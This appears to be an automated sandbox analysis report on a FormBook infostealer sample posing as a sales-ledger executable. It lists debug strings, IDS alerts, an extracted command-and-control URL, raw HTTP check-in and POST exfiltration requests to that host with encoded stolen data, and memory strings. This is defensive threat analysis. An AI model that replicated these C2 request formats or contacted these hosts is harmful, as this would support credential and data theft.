Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source:	Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source:	Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.consultoramulticars.com/suod/

Source: global traffic

HTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE

Source: global traffic	HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).
Source: global traffic	HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 170153Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 32 32 73 76 55 45 78 75 58 69 51 6a 44 6d 75 35 69 6a 62 79 55 67 5a 6f 72 30 7a 72 6b 57 79 39 54 57 38 70 47 62 6b 6b 38 4f 52 34 66 48 53 68 4f 71 32 57 47 78 36 43 79 49 73 64 72 72 77 65 49 6f 79 34 54 47 6a 62 66 4b 7a 51 31 35 51 43 46 4e 4c 6d 35 38 49 53 5f 68 41 30 50 48 6f 30 34 42 53 43 63 75 4e 78 6d 68 55 35 4e 58 45 73 48 4b 6c 37 7a 64 72 4d 45 31 51 48 74 65 47 51 70 48 6a 66 6c 5a 6d 7e 6f 68 71 4f 32 45 45 43 69 39 59 4a 70 4d 2d 63 37 46 4c 72 36 79 6f 6d 6f 57 6b 4c 67 75 44 62 46 28 69 4e 78 5a 52 65 35 49 6b 45 35 68 57 79 49 51 77 67 42 45 6e 56 64 4f 59 30 64 39 59 46 65 45 48 68 6b 4b 55 51 4d 69 4f 70 79 47 55 47 53 63 50 62 6c 42 4c 6c 77 41 69 42 53 38 4d 39 76 35 57 39 4b 4f 5f 58 59 45 34 51 4e 43 32 47 31 67 55 4a 49 66 5f 69 7a 61 55 39 72 69 7a 28 75 6c 4b 5a 6b 4e 44 57 75 4a 30 79 7a 54 30 51 46 76 33 45 48 44 42 59 36 44 58 4f 58 41 6b 44 32 78 5a 6b 38 64 36 54 77 73 41 62 6a 4c 6c 32 4d 64 54 67 59 56 6b 77 77 34 31 79 42 52 30 7a 62 61 6c 69 39 7a 79 69 67 35 75 69 44 28 72 63 38 7e 37 65 78 46 69 34 57 47 73 5a 50 69 6d 62 74 76 38 65 2d 52 63 70 78 46 5f 4b 4d 69 72 32 67 38 42 54 50 44 4d 71 61 6a 6a 59 32 56 57 67 42 32 36 4e 4b 28 35 46 6e 4a 79 6e 41 69 55 52 69 47 54 28 53 69 54 77 52 75 57 53 75 78 48 71 49 48 68 37 42 44 4e 53 75 55 6d 42 74 43 4c 71 31 67 6f 48 36 64 4b 56 4e 47 57 28 67 47 6e 7e 78 28 74 28 62 6b 56 6c 72 74 56 7a 78 35 69 6f 5f 47 65 36 57 73 63 56 62 4f 73 57 45 36 37 33 34 6b 5f 58 69 6c 6c 36 77 4d 36 66 73 70 4c 7e 48 45 50 42 34 45 62 34 42 54 44 37 49 4c 56 31 4b 7e 44 69 54 4e 69 38 4f 73 59 36 42 63 42 78 30 65 49 71 38 5a 34 45 53 48 67 55 75 58 47 53 66 74 6e 30 45 72 45 77 74 73 56 32 63 33 6b 45 37 65 76 42 65 61 46 64 5a 56 32 74 56 58 74 6f 59 31 6c 44 62 4c 73 36 38 30 6c 62 53 69 51 6c 6b 70 46 50 36 62 50 64 46 33 48 30 74 57 4a 7a 49 64 41 44 72 36 6f 37 71 54 51 28 30 49 33 56 51 44 72 7a 35 6a 73 6f 62 46 43 38 71 66 6b 48 51 6b 66 67 65 78 52 36 58 28 39 74 56 56 6d 66 46 73 65 62 74 36 73 6c 53 50 30 6a 56 66 50 4f 36 57 48 52 52 4b 66 63 38 69 73 62 54 7e 52 76 32 52 54 51 30 58 78 66 6b 4d 62 4c 68 54 41 38 74 73 68 4b 31 31 34 46 47 42 7a 38 56 74 52 42 56 73 42 28 6c 6e 4a 51 62 30 35 50 76 48 51 6d 32 45 75 4d 6d 62 48 28 2d 34 57 79 4f 55 75 4a 7a 53 6a 39 56 64 73 65 50 28 4e 74 4a 62 30 54 30 59 50 4e 6b 55 73 4d 71 6e 76 72 4f 53 57 37 30 38 47 69 62 64 6a 33 4c 73 51 76 34 64 74 6a 45 30 4c 41 7a 7e 42 67 51 63 4d 78 64 28 76 72 5a 64 4a 4a 42 4d 76 28 44 30 46 30 41 57 38 4e 4a 77 56 73

Source: C:\Windows\explorer.exe

Code function: 25_2_061C67C2 getaddrinfo,setsockopt,recv,

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.seniorlivingcaelderly.com

Source: unknown

HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).

Source: explorer.exe, 00000019.00000000.349774799.0000000008A2E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icogk
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coml1
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnto
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmcP
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-czti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Bi)
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ftYi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Yi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/d.
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s20
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpc
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpj
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://www.nirsoft.net/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp	String found in binary or memory: http://www.seniorlivingcaelderly.com
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp	String found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/4
